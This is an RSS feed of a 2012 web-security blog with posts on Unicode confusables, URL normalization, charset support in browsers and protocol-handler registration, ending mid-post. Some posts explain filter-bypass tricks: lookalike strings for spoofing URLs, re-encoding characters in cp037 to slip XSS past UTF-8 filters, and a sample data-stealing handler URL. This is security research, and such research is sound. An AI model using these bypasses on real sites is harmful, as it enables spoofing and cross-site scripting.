<?xml version='1.0' encoding='UTF-8'?><rss xmlns:atom='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0' version='2.0'><channel><atom:id>tag:blogger.com,1999:blog-3867003125940558889</atom:id><lastBuildDate>Mon, 21 May 2012 06:10:51 +0000</lastBuildDate><category>fuzzing</category><category>ICU</category><category>UTF8</category><category>protocol</category><category>marshalling</category><category>tools</category><category>advisory</category><category>gflags</category><category>debugging</category><category>encoding</category><category>W3C</category><category>development</category><category>ping</category><category>malware</category><category>penetration testing</category><category>URI</category><category>encodings</category><category>Windows</category><category>normalization</category><category>bitlocker</category><category>code2000</category><category>general</category><category>sql injection</category><category>BOM</category><category>browsers</category><category>Web</category><category>spoofing</category><category>firefox</category><category>sharepoint</category><category>whitelist</category><category>ActiveX</category><category>confusables</category><category>cross site request forgery</category><category>browser</category><category>viewstateuserkey</category><category>SSL</category><category>mashup</category><category>cross domain</category><category>Watcher</category><category>code review</category><category>debug</category><category>scheme</category><category>IRI</category><category>charsets</category><category>CSIDL</category><category>internet explorer</category><category>IDNA</category><category>security</category><category>Opera</category><category>test cases</category><category>utf-8</category><category>IDN</category><category>font</category><category>web 
services</category><category>rootkit</category><category>phishing</category><category>Unicode</category><category>software</category><category>pageheap</category><category>HTML</category><category>asp.net</category><category>TLS</category><category>cascading style sheets</category><category>testing</category><category>cross site scripting</category><category>specifications</category><category>RLO</category><category>JavaScript</category><category>plugins</category><category>XSS</category><category>Webkit</category><category>moss</category><category>best-fit</category><category>filtering</category><category>sitelock</category><category>OpenBSD</category><title>chris weber's blog</title><description></description><link>http://web.lookout.net/</link><managingEditor>noreply@blogger.com (Chris Weber)</managingEditor><generator>Blogger</generator><openSearch:totalResults>81</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-3867003125940558889.post-8126973241422461874</guid><pubDate>Thu, 05 Apr 2012 00:43:00 +0000</pubDate><atom:updated>2012-04-04T17:43:57.509-07:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>confusables</category><title>Generating confusable, lookalike strings</title><description>&lt;p&gt;The Unicode Consortium released a &lt;a href="http://unicode.org/cldr/utility/confusables.jsp"&gt;utility to generate confusable strings&lt;/a&gt; quite a while ago.  Since I've seen people trying to create similar tools themselves recently, I thought it might be worth mentioning.&lt;/p&gt;    &lt;p&gt;In case you haven't received the memo about confusables, also known as homoglyphs, lookalikes, and spoofs - they are characters that visually resemble or are indistinguishable from another character.  
You can read more about it &lt;a href="http://web.lookout.net/search/label/confusables"&gt;here&lt;/a&gt; or virtually any other place on the Web by searching for some of these terms.  For example the following two characters are visually similar and confusing:&lt;/p&gt; &lt;p&gt;FF21 ; 0041 ; SA # ( Ａ → A ) FULLWIDTH LATIN CAPITAL LETTER A → LATIN CAPITAL LETTER A&lt;/p&gt; &lt;p&gt;Sometimes during penetration testing, we want to bypass profanity filters, spoof URLs, spoof email addresses, or perform other tasks.  Being able to generate lookalike strings can be quite useful in these cases, but of course is not the only method required.  If you require such capability, then go check out the Unicode Consortium's utility at &lt;a href="http://unicode.org/cldr/utility/confusables.jsp"&gt;http://unicode.org/cldr/utility/confusables.jsp&lt;/a&gt;, but please don't share this link with the bad guys.&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3867003125940558889-8126973241422461874?l=web.lookout.net' alt='' /&gt;&lt;/div&gt;</description><link>http://web.lookout.net/2012/04/generating-confusable-lookalike-strings.html</link><author>noreply@blogger.com (Chris Weber)</author><thr:total>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-3867003125940558889.post-7639801766850942254</guid><pubDate>Sat, 17 Mar 2012 19:22:00 +0000</pubDate><atom:updated>2012-04-12T14:09:31.645-07:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>URI</category><category domain='http://www.blogger.com/atom/ns#'>Unicode</category><category domain='http://www.blogger.com/atom/ns#'>normalization</category><category domain='http://www.blogger.com/atom/ns#'>IRI</category><title>Unicode Normalization in URLs</title><description>&lt;p&gt;In some contexts, normalizing a string means upper or lower-casing it.  
In Unicode "&lt;a href="http://www.unicode.org/reports/tr15/"&gt;normalization&lt;/a&gt;" means something quite different.  The Unicode standard offers four "normalization" forms which irreversibly transform a given character or sequence of characters according to either a simple mapping rule, or a more complex algorithmic rule.  Since browser interoperability depends on each browser processing a URL the same as the next, I thought testing some of the more popular browsers might be a good idea.  &lt;/p&gt; &lt;h2&gt;Why should you care?&lt;/h2&gt;&lt;p&gt;If you're a Web developer using Unicode anywhere in your URLs, then you're probably concerned when those URLs get handled differently in various Web browsers.  If you're a penetration tester, you probably like to find quirky ways that URLs get transformed.&lt;/p&gt;     &lt;h2&gt;Test Setup&lt;/h2&gt;&lt;p&gt;To test Unicode normalization I used some of the character sequences from &lt;a href="http://www.unicode.org/reports/tr15"&gt;Unicode Standard Annex 15 "Unicode Normalization Forms"&lt;/a&gt; and others from RFC3197.  From TR15 I looked at a Singleton from Figure 3 - U+212B which normalizes to U+00C5 &amp;#x00C5; under NFC, and U+0041 U+030A A&amp;#x030A; under NFD.  I also looked at multiple combining marks from Figure 5, U+10EB U+0323 &amp;#x10EB;&amp;#x0323;, and the sequence U+1E9B U+0323 &amp;#x1E9B;&amp;#x0323; from Figure 6 Compatibility Composites.  Through those few tests we can test for each of the four normalization forms, and see NFC being applied in Safari and Chrome (in different ways), and rule out NFD, NFKC, and NFKD. &lt;/p&gt;  &lt;h2&gt;Test Results&lt;/h2&gt; &lt;p&gt;I was hoping to find some security bugs, but only found interoperability bugs.  That doesn't mean security bugs don't exist here.  As if URLs weren't tricky enough with plain old ASCII, handling Unicode characters makes them even more open to interpretation.  
For example, an Internationalized Resource Identifier (IRI) with a path, query, and fragment containing U+212B &lt;span class="code"&gt;#&amp;#x212B;&lt;/span&gt; means code point U+212B to IE, Firefox, and Opera, but it means U+00C5 &lt;span class="code"&gt;#&amp;#x00C5;&lt;/span&gt; to Chrome (in the fragment only), and U+00C5 percent-encoded &lt;span class="code"&gt;#%C3%85&lt;/span&gt; to Safari (in the path, query, and fragment).   &lt;/p&gt; &lt;p&gt;These types of character transformations make for ripe targets in security testing, but only when the resulting character has some practical use such as bypassing an XSS or SQL injection filter.  When a certain input X transforms to become Y, an attacker has more opportunity to slip a malicious link or XSS payload past an unsuspecting defensive filter.  In testing how Web browsers normalize Unicode across a URL/IRI's components, I made the following observations.&lt;/p&gt; &lt;ol&gt;&lt;li&gt;Safari applies NFC normalization to the path, query, and fragment.&lt;/li&gt;&lt;li&gt;Chrome applies NFC normalization to the fragment only.&lt;/li&gt;&lt;li&gt;MSIE, Firefox, and Opera do not apply normalization anywhere.&lt;/li&gt;&lt;li&gt;MSIE violates RFC 3986 by sending raw, unescaped UTF-8 bytes in the query during an HTTP request.&lt;/li&gt;&lt;li&gt;Chrome, Safari, Firefox, and Opera all send percent-encoded UTF-8 in the path and query during an HTTP request.&lt;/li&gt;&lt;li&gt;Safari percent-encodes the fragment.&lt;/li&gt;&lt;/ol&gt; &lt;p&gt;Firefox and Opera seem to be the only two that agree in all tests, Chrome is a little odd with the fragment, and Safari is the odd guy out across the entire URL.  IE is the only browser that sends raw UTF-8 encoded bytes out on the wire (in the query component only), but I think that &lt;a href="http://tools.ietf.org/html/rfc3986#section-3.4"&gt;RFC 3986 allows for that anyway&lt;/a&gt;.&lt;/p&gt;   
&lt;p&gt;My conclusions were based on reviewing the following:&lt;/p&gt;&lt;ol&gt;&lt;li&gt;The DOM property values for the anchor element, which included an individual test case.&lt;/li&gt;&lt;li&gt;The raw HTTP GET request (for the img) as sniffed off the wire using winpcap, triggered by a test case using the img element.&lt;/li&gt;&lt;/ol&gt; &lt;p&gt;The spreadsheet below includes a table of results observed from the &lt;a href="http://www.lookout.net/test/iri/normalize.php"&gt;test cases&lt;/a&gt;, and can also be &lt;a href="https://docs.google.com/spreadsheet/pub?hl=en_US&amp;key=0At1OFOiVqCrvdFo3aFc1elhXS2pnVkpxOFZORjQ1cUE&amp;hl=en_US&amp;gid=4"&gt;opened in a separate window&lt;/a&gt;.&lt;/p&gt; &lt;iframe width='800' height='800' frameborder='0' src='https://docs.google.com/spreadsheet/pub?key=0At1OFOiVqCrvdFo3aFc1elhXS2pnVkpxOFZORjQ1cUE&amp;output=html&amp;gid=4&amp;widget=true'&gt;&lt;/iframe&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3867003125940558889-7639801766850942254?l=web.lookout.net' alt='' /&gt;&lt;/div&gt;</description><link>http://web.lookout.net/2012/03/unicode-normalization-in-urls.html</link><author>noreply@blogger.com (Chris Weber)</author><thr:total>6</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-3867003125940558889.post-7470854390767278397</guid><pubDate>Mon, 13 Feb 2012 17:09:00 +0000</pubDate><atom:updated>2012-02-13T09:09:46.459-08:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>Web</category><category domain='http://www.blogger.com/atom/ns#'>browsers</category><category domain='http://www.blogger.com/atom/ns#'>charsets</category><category domain='http://www.blogger.com/atom/ns#'>encodings</category><title>Testing charset encoding support in Web Browsers</title><description>Note: To jump straight to the test page click here &lt;a 
href="http://www.lookout.net/test/charsets/iana-charset-support/"&gt;http://www.lookout.net/test/charsets/iana-charset-support/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Web browsers support a variety of character set encodings mostly for legacy reasons and backwards compatibility.  After all, UTF-8 and a handful of other encodings today are capable of representing all of the characters that were once relegated to a wide assortment of character encodings.  It's evident from Google's February 2012 report that UTF-8 is dominating the Web, with&amp;nbsp;&lt;a href="http://googleblog.blogspot.com/2012/02/unicode-over-60-percent-of-web.html"&gt;60% of Web documents using UTF-8&lt;/a&gt;&amp;nbsp;- and that number is rising as legacy character encodings decline in use. &lt;br /&gt;&lt;br /&gt;Those of us who test Web application security are often concerned with character encodings in our attempts to manipulate string input in ways that would eventually lead to mayhem.  For that reason it's good to know a bit not just about which encodings the server-side components support, but also which ones the Web browser supports.  I've documented the results of &lt;a href="http://www.lookout.net/test/charsets/iana-charset-support/"&gt;testing character set support in Web browsers&lt;/a&gt; in the table below, along with a brief summary. &lt;br /&gt;&lt;h2&gt;Test Results&lt;/h2&gt;The following table, which can also be &lt;a href="https://docs.google.com/spreadsheet/pub?hl=en_US&amp;amp;hl=en_US&amp;amp;key=0At1OFOiVqCrvdFo3aFc1elhXS2pnVkpxOFZORjQ1cUE&amp;amp;single=true&amp;amp;gid=2&amp;amp;output=html"&gt;opened in a new window&lt;/a&gt;, lists all of the supported charset encodings in each Web browser tested, on Windows 7 and Ubuntu 11.10 where possible. &amp;nbsp;Testing was only concerned with &lt;a href="http://www.iana.org/assignments/character-sets"&gt;IANA's official list of character set names&lt;/a&gt; that may be used on the Internet. 
&lt;br /&gt;&lt;br /&gt;&lt;h3&gt;Default Fallback Encoding&lt;/h3&gt;Most browsers use UTF-8 as the default fallback encoding. &amp;nbsp;However, Safari, and Chrome on Ubuntu, fell back to ISO-8859-1 when an unrecognized charset label, such as "freshies", was tested. &lt;br /&gt;&lt;br /&gt;&lt;h3&gt;Supported charset labels&lt;/h3&gt;The results also show all supported character set labels per browser, in a comma-separated form of&amp;nbsp;&lt;span style="color: green; font-family: 'Bitstream Vera Sans Mono', 'Andale Mono', 'Lucida Console', monospace, fixed; word-spacing: 2px;"&gt;named_charset&lt;/span&gt;&lt;span class="framecharset" style="color: grey; font-family: 'Bitstream Vera Sans Mono', 'Andale Mono', 'Lucida Console', monospace, fixed; margin-bottom: 2px; margin-left: 2px; margin-right: 2px; margin-top: 2px; padding-bottom: 2px; padding-left: 2px; padding-right: 2px; padding-top: 2px; word-spacing: 2px;"&gt;,interpreted_charset&lt;/span&gt;&amp;nbsp;where the named_charset was the test case and the interpreted_charset was what the Web browser's &lt;span class="code"&gt;contentDocument.charset&lt;/span&gt; property returned. &amp;nbsp;Using&amp;nbsp;&lt;span style="color: green; font-family: 'Bitstream Vera Sans Mono', 'Andale Mono', 'Lucida Console', monospace, fixed; word-spacing: 2px;"&gt;iso-ir-144&lt;/span&gt;&lt;span class="framecharset" style="color: grey; font-family: 'Bitstream Vera Sans Mono', 'Andale Mono', 'Lucida Console', monospace, fixed; margin-bottom: 2px; margin-left: 2px; margin-right: 2px; margin-top: 2px; padding-bottom: 2px; padding-left: 2px; padding-right: 2px; padding-top: 2px; word-spacing: 2px;"&gt;,ISO-8859-5&lt;/span&gt;&amp;nbsp;as an example - the test returned a document with the charset in the HTTP Content-Type header set to iso-ir-144. &amp;nbsp;Then the&amp;nbsp;&lt;span class="code"&gt;contentDocument.charset&lt;/span&gt; property was checked and found to be ISO-8859-5. 
&amp;nbsp;Since the two were aliases for one another the test was considered a pass, meaning the charset label was supported by the browser.&lt;br /&gt;&lt;br /&gt;&lt;h3&gt;Charset labels that fall back to a non-equivalent&amp;nbsp;IANA alias&lt;/h3&gt;If the&amp;nbsp;&lt;span class="code"&gt;contentDocument.charset&lt;/span&gt; returned a value that was not an equivalent charset alias for the test case (according to IANA's list) then it was deemed a failed test case. &amp;nbsp;Often, however, the interpreted_charset was in fact an equivalent, or superset, encoding, even though it was not listed as such by IANA. &amp;nbsp;In some barely interesting cases a vendor-specific charset label could be found this way, such as &lt;span class="code"&gt;unicodeFEFF&lt;/span&gt; which seems to only be used by Internet Explorer.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;iframe src="https://docs.google.com/spreadsheet/pub?hl=en_US&amp;amp;hl=en_US&amp;amp;key=0At1OFOiVqCrvdFo3aFc1elhXS2pnVkpxOFZORjQ1cUE&amp;amp;single=true&amp;amp;gid=2&amp;amp;output=html&amp;amp;widget=true" style="border: 0px; height: 800px; width: 100%;"&gt;&lt;/iframe&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3867003125940558889-7470854390767278397?l=web.lookout.net' alt='' /&gt;&lt;/div&gt;</description><link>http://web.lookout.net/2012/02/testing-charset-encoding-support-in-web.html</link><author>noreply@blogger.com (Chris Weber)</author><thr:total>0</thr:total><georss:featurename>Seattle, WA, USA</georss:featurename><georss:point>47.6062095 -122.3320708</georss:point><georss:box>47.520564 -122.4899993 47.691855 -122.1741423</georss:box></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-3867003125940558889.post-1353962055014667303</guid><pubDate>Mon, 06 Feb 2012 16:00:00 +0000</pubDate><atom:updated>2012-02-06T19:41:29.205-08:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>Web</category><category 
domain='http://www.blogger.com/atom/ns#'>browsers</category><category domain='http://www.blogger.com/atom/ns#'>testing</category><category domain='http://www.blogger.com/atom/ns#'>charsets</category><title>Testing ASCII-unsafe encodings in Web browsers</title><description>Note: To jump straight to the test page click here&amp;nbsp;&lt;a href="http://lookout.net/test/charsets/ascii-unsafe/"&gt;http://lookout.net/test/charsets/ascii-unsafe/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;[UPDATE: Some &lt;a href="https://plus.google.com/102891963682045703790/posts/TvKKdF4hstD"&gt;feedback&lt;/a&gt; from Anne van Kesteren pointed to the fact that all browsers do support HZ-GB-2312, even though the test results showed IE and Firefox did not. The direct URL for that particular encoding test is &lt;a href="http://lookout.net/test/charsets/ascii-unsafe/charset.php?alias=HZ-GB-2312"&gt;http://lookout.net/test/charsets/ascii-unsafe/charset.php?alias=HZ-GB-2312&lt;/a&gt;. Looking closer it seems the ICU transcoding added a two-byte preamble to the string, namely 0x7E 0x7D, or '~}'. I'm not very familiar with HZ-GB-2312 but a quick look at RFC 1843 tells me that this two-byte sequence switches the context from GB-mode to ASCII-mode. So it seems that Firefox and IE do not recognize this mode-switching byte-sequence, or at least not in this context.] &lt;br /&gt;&lt;br /&gt;Web browsers support a variety of character set encodings which could be broadly categorized as either ASCII-safe [1] or ASCII-unsafe [2]. &amp;nbsp;The goal of this test was to identify which ASCII-unsafe character encodings were supported by each Web browser.&lt;br /&gt;&lt;br /&gt;String encodings play an important role in testing Web applications for security vulnerabilities. &amp;nbsp;If I can control some input's encoding then I will manipulate it in ways that might confuse a parsing process or bypass a defensive filter. 
&amp;nbsp;To use a common example - imagine you input a string somewhere that includes the U+003E GREATER-THAN SIGN '&amp;gt;' in a meager attempt at cross-site scripting. &amp;nbsp;An XSS filter consumes the input as UTF-8 (which is ASCII-safe) and immediately recognizes the 0x3E byte as something naughty, at which point it throws back an error message. &amp;nbsp;Since you realize that a query string parameter (e.g. &amp;amp;charset=utf-8) controls the page's output encoding you change the charset parameter's value to 'cp037' and encode the input string accordingly. &amp;nbsp;In the cp037 encoding, the '&amp;gt;' character is represented with the byte 0x6E, which in ASCII would be the 'n' character, two completely different characters. &amp;nbsp;The character slips by the filter, which assumes it was encoded as UTF-8, and makes its way on to the destination. &amp;nbsp;The reason for the confusion was that the two encodings cp037 and UTF-8 (ASCII-safe) are not compatible.&lt;br /&gt;&lt;br /&gt;&lt;h2&gt;How the testing was set up&lt;/h2&gt;The &lt;a href="http://lookout.net/test/charsets/ascii-unsafe/"&gt;test page&lt;/a&gt; attempts to identify which ASCII-unsafe charsets a Web browser supports by loading a string encoded in each charset, and testing if the browser decoded it as expected. &amp;nbsp;The page uses XMLHttpRequest to fetch each string from the server, which returns the string in an HTTP response whose Content-Type header carries the corresponding charset label for the test case. &amp;nbsp;The test page then decodes the string according to the charset label, and tests it for equivalence with the following static control string.&lt;br /&gt;&lt;br /&gt;&lt;pre&gt; $%'()*+,-./&amp;lt;&amp;gt;:;=&lt;/pre&gt;&lt;br /&gt;There are some potential pitfalls to this approach. 
&amp;nbsp;The most obvious is that the browser may not officially support the given charset encoding under test, but may instead be applying some intelligence (e.g. sniffing) to the string to try to figure out what its encoding could be. &amp;nbsp;For example, many of the ASCII-unsafe encodings share similar ranges of characters, where the '&amp;gt;' may actually be represented with byte 0x6E in all of them. &amp;nbsp;So if you were to test using only a single character you might end up with false positives if the browser was sniffing and decided that the encoding was 'cp237' instead of 'cp037'. &amp;nbsp;Although these are both variants of EBCDIC, there are some differences. &amp;nbsp;So the test ended up using a string of many characters, which still doesn't totally solve the challenge. &amp;nbsp;However, it works okay and produces decent results. &lt;br /&gt;&lt;br /&gt;Because the testing uses the&amp;nbsp;&lt;a href="http://userguide.icu-project.org/conversion/converters"&gt;ICU project&lt;/a&gt;&amp;nbsp;to build the test strings, it's limited to only the character set tables that ICU includes. &amp;nbsp;That's quite a lot mind you, but some other interesting &lt;a href="http://unicode.org/Public/MAPPINGS/VENDORS/"&gt;variants and oddities&lt;/a&gt; might not be included.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;h3&gt;Transcoding the test string&lt;/h3&gt;The test string shown above uses 17 characters with familiar names - this string gets transcoded into 417 different character set encodings (the recurring 17 is just coincidence, I think). &amp;nbsp;Because most of the 417 labels are just aliases for a superset, they can be further grouped into a much smaller set of around 17 (just kidding) encodings. &lt;br /&gt;&lt;br /&gt;The &lt;a href="http://userguide.icu-project.org/conversion/converters"&gt;ICU project's Converter API&lt;/a&gt; was used to perform the transcoding. 
&amp;nbsp;ICU also provided all of the &lt;a href="http://demo.icu-project.org/icu-bin/convexp?"&gt;charset aliases/labels&lt;/a&gt; used for testing. &amp;nbsp;The code for transcoding is &lt;a href="https://github.com/cweb/web-charset-tests/blob/master/src/transcode/transcode.c"&gt;available on github&lt;/a&gt; for the curious. &lt;br /&gt;&lt;br /&gt;&lt;h2&gt;Test Results&lt;/h2&gt;The following table, which can also be &lt;a href="https://docs.google.com/spreadsheet/pub?hl=en_US&amp;amp;hl=en_US&amp;amp;key=0At1OFOiVqCrvdFo3aFc1elhXS2pnVkpxOFZORjQ1cUE&amp;amp;output=html"&gt;opened in a new window&lt;/a&gt;, lists all of the ASCII-unsafe charsets supported in each Web browser tested. &lt;br /&gt;&lt;iframe src="https://docs.google.com/spreadsheet/pub?hl=en_US&amp;amp;hl=en_US&amp;amp;key=0At1OFOiVqCrvdFo3aFc1elhXS2pnVkpxOFZORjQ1cUE&amp;amp;single=true&amp;amp;gid=3&amp;amp;output=html&amp;amp;widget=true" style="border: 0px; height: 800px; width: 100%;"&gt;&lt;/iframe&gt;&lt;br /&gt;&lt;h2&gt;Notes&lt;/h2&gt;[1] ascii-safe An ASCII-compatible character encoding is a single-byte or variable-length  encoding in which the bytes 0x09, 0x0A, 0x0C, 0x0D, 0x20 - 0x22, 0x26, 0x27,  0x2C - 0x3F, 0x41 - 0x5A, and 0x61 - 0x7A, ignoring bytes that are the second  and later bytes of multibyte sequences, all correspond to single-byte sequences  that map to the same Unicode characters as those bytes in  ANSI_X3.4-1968 (US-ASCII). 
[RFC1345] &lt;br /&gt;&lt;br /&gt;[2] ascii-unsafe ASCII-compatible bytes do not map.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3867003125940558889-1353962055014667303?l=web.lookout.net' alt='' /&gt;&lt;/div&gt;</description><link>http://web.lookout.net/2012/02/testing-ascii-unsafe-encodings-in-web.html</link><author>noreply@blogger.com (Chris Weber)</author><thr:total>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-3867003125940558889.post-507807102126684043</guid><pubDate>Mon, 30 Jan 2012 17:42:00 +0000</pubDate><atom:updated>2012-02-21T21:12:45.724-08:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>Web</category><category domain='http://www.blogger.com/atom/ns#'>URI</category><category domain='http://www.blogger.com/atom/ns#'>W3C</category><category domain='http://www.blogger.com/atom/ns#'>scheme</category><title>Testing registerProtocolHandler and the web+ scheme prefix</title><description>&lt;p class="note"&gt;Note: jump straight to the &lt;a href="http://www.lookout.net/test/handler/"&gt;test page for navigator.registerProtocolHandler and web+&lt;/a&gt; if you'd rather...&lt;/p&gt;&lt;p&gt;A &lt;a href="http://tools.ietf.org/html/rfc3986"&gt;URI (Uniform Resource Identifier)&lt;/a&gt; is easily the most recognizable protocol element of the Web.  A URL (Uniform Resource Locator) is a form of URI which includes an access mechanism (e.g. a network location).  The terms are often used interchangeably, and to add to the terminology, these protocol elements may also be &lt;a href="http://tools.ietf.org/wg/iri"&gt;IRIs (Internationalized Resource Identifiers)&lt;/a&gt;, which can be thought of as a fork of URI that may include characters outside of the US-ASCII character set.  So, &lt;span class="code"&gt;http://www.lookout.net/index.html&lt;/span&gt; would qualify as a URL, a URI, and an IRI.  
The 'scheme' part of this URI would be 'http', which refers to the specification that further defines how the URI parts should be processed.&lt;/p&gt;&lt;p&gt;The ABNF grammar for a &lt;a href="http://tools.ietf.org/html/rfc3986#section-3.1"&gt;URI scheme&lt;/a&gt; is defined by RFC3986 as: &lt;br /&gt;&lt;pre&gt;scheme = ALPHA *( ALPHA / DIGIT / "+" / "-" / "." )&lt;/pre&gt;&lt;/p&gt;&lt;p&gt;Quite simply, scheme names can only consist of the letters a-z, the numbers 0-9, and the three special characters '+', '-', and '.'.   Uppercase letters A-Z in a scheme name would be canonicalized to lowercase as defined by the spec and as we see in most implementations.  The syntax rules for a scheme are simple and do not impose arbitrary length limits, although most implementations will enforce their own length limit.  Schemes are registered through an official &lt;a href="http://www.iana.org/assignments/uri-schemes.html"&gt;IANA registry&lt;/a&gt;.  Depending on who you ask, the process is not difficult but does involve some time and a manual review.  The registry was designed to centrally coordinate and organize scheme registrations so they would be documented and publicly available.  However over the years, many scheme names have been invented by application owners who did not use this process.&lt;/p&gt; &lt;h2&gt;Protocol handlers in the Web browser&lt;/h2&gt;&lt;p&gt;The DOM function &lt;a href="https://developer.mozilla.org/en/DOM/window.navigator.registerProtocolHandler"&gt;navigator.registerProtocolHandler&lt;/a&gt; takes three parameters - a URI, a scheme name, and a title.  These are used to register a protocol scheme name, such as http or mailto, to an arbitrary URI that should be used to handle that scheme.  
For example, you might want to let Hotmail register the 'mailto' protocol to be handled by some URI like &lt;span class="code"&gt;https://www.hotmail.com/?email=%s&lt;/span&gt;.  The '%s' is required in the URI registration and will be replaced with the entire reference URI.&lt;/p&gt; &lt;p&gt;Using the above registration, if you clicked on a link like &lt;span class="code"&gt;mailto:chris@lookout.net&lt;/span&gt; the browser would open &lt;span class="code"&gt;https://www.hotmail.com/?email=mailto%3Achris%40lookout.net&lt;/span&gt;.  In fact, the registration may persist at the OS layer, in which case it would be available to any application. &lt;/p&gt; &lt;p&gt;web+ is a new scheme &lt;b&gt;prefix&lt;/b&gt; introduced by HTML5.  I'm not clear on the purpose of this new prefix, but I can imagine seeing future schemes like web+tweet, web+like, and web+comment.  In practice I suppose that application developers could register ad hoc schemes and would likely never go through the official IETF/IANA process.  
Some schemes would end up becoming popular and persisting while others would just fade away.&lt;/p&gt; &lt;h2&gt;Risks to Security and Privacy&lt;/h2&gt;&lt;p&gt;Many risks have been documented in the W3C specification including the following:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Hijacking all Web usage&lt;/li&gt;&lt;li&gt;Hijacking defaults&lt;/li&gt;&lt;li&gt;Registration spamming&lt;/li&gt;&lt;li&gt;Misleading titles&lt;/li&gt;&lt;li&gt;Hostile handler metadata&lt;/li&gt;&lt;li&gt;Leaking Intranet URLs&lt;/li&gt;&lt;li&gt;Leaking secure URLs&lt;/li&gt;&lt;li&gt;Leaking credentials&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Others perhaps had not been considered or clearly listed, such as the capability to track users through unique identifiers appended to the web+ prefix, discussed more below.&lt;/p&gt; &lt;h2&gt;Test results&lt;/h2&gt;&lt;p&gt;The table below, which &lt;a href="https://docs.google.com/spreadsheet/pub?hl=en_US&amp;hl=en_US&amp;key=0At1OFOiVqCrvdFo3aFc1elhXS2pnVkpxOFZORjQ1cUE&amp;single=true&amp;gid=1&amp;output=html"&gt;can also be opened in a separate window&lt;/a&gt;, summarizes the test results, which are discussed a bit more below.  The &lt;a href="http://www.lookout.net/test/handler/"&gt;test page&lt;/a&gt; is available online where you can quickly run the canned tests or create ad hoc tests.&lt;/p&gt; &lt;iframe style="width: 100%; height: 800px; border: 0px;" src="https://docs.google.com/spreadsheet/pub?hl=en_US&amp;hl=en_US&amp;key=0At1OFOiVqCrvdFo3aFc1elhXS2pnVkpxOFZORjQ1cUE&amp;single=true&amp;gid=1&amp;output=html"&gt;&lt;/iframe&gt; &lt;p&gt;As you can imagine, it would be devastating if one could register an arbitrary web+ scheme to the 'javascript' handler.  As many XSS filters around the web intentionally block 'javascript:' in forums and comments, they would be immediately hosed when web+foo could achieve the same effect.  
It would be just as devastating if the 'http' handler could be controlled, so that all links ended up going to http://nottrusted.com?stealing=your%20data.  Fortunately, all browsers tested prohibited such registration attempts.&lt;/p&gt; &lt;p&gt;Also fortunately, all of the browsers tested properly prohibited cross-origin registrations, even within the same general domain - registrations to a subdomain and parent domain were both prohibited, as were registrations to completely different domains.  However, both Firefox and Opera allowed registrations to https from an http domain, but only Firefox allowed the reverse - registration from an https origin to http.  Additionally, Firefox was the only browser to allow registrations to URIs with completely arbitrary ports, e.g. 23.&lt;/p&gt; &lt;p&gt;And what characters are allowed in a web+ scheme? The specification allows only the letters a-z after the prefix, but does not propose limits on length.  Opera did not allow web+ registrations during testing, and both Chrome and Firefox allowed more than the small set of characters a-z.  In fact, Firefox allowed any character whatsoever to be registered, &lt;b&gt;with or without the prefix&lt;/b&gt;, including any Unicode code point.  Chrome only allowed the characters +, -, ., a-z, A-Z, and 0-9, in the ASCII range.  Chrome was also liberal with Unicode and would allow most, but not all, code points above U+00FF.  Of course this is pointless, because having anything but the URI-defined set of limited ASCII in the scheme would be prohibited and instead interpreted as a relative path in all modern Web browsers.&lt;/p&gt; &lt;p&gt;The User Interface seemed quite confusing in all cases except for Opera, which displayed the clearest message of the bunch.  Both Chrome and Firefox used confusing messages that I cannot imagine a non-technical user would understand.  Heck, they were even confusing to me.  
Take a look at the following and judge for yourself, from top to bottom they are Opera, Firefox, and Chrome.&lt;/p&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-vqCAdpUphYc/TybYGiQKbrI/AAAAAAAAAMY/ritoua3mU14/s1600/ui-confusion-opera.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="40" width="400" src="http://1.bp.blogspot.com/-vqCAdpUphYc/TybYGiQKbrI/AAAAAAAAAMY/ritoua3mU14/s400/ui-confusion-opera.JPG" /&gt;&lt;/a&gt;&lt;/div&gt; &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-ejgdWiLQzkM/TybYJjnWLDI/AAAAAAAAAMk/09rceqbO4FI/s1600/ui-confusion-ff.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="33" width="400" src="http://1.bp.blogspot.com/-ejgdWiLQzkM/TybYJjnWLDI/AAAAAAAAAMk/09rceqbO4FI/s400/ui-confusion-ff.JPG" /&gt;&lt;/a&gt;&lt;/div&gt; &lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-9qXCvXgCAq0/TybYJmQ-43I/AAAAAAAAAMs/UnBmpqLVlm4/s1600/ui-confusion-chrome.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"&gt;&lt;img border="0" height="48" width="400" 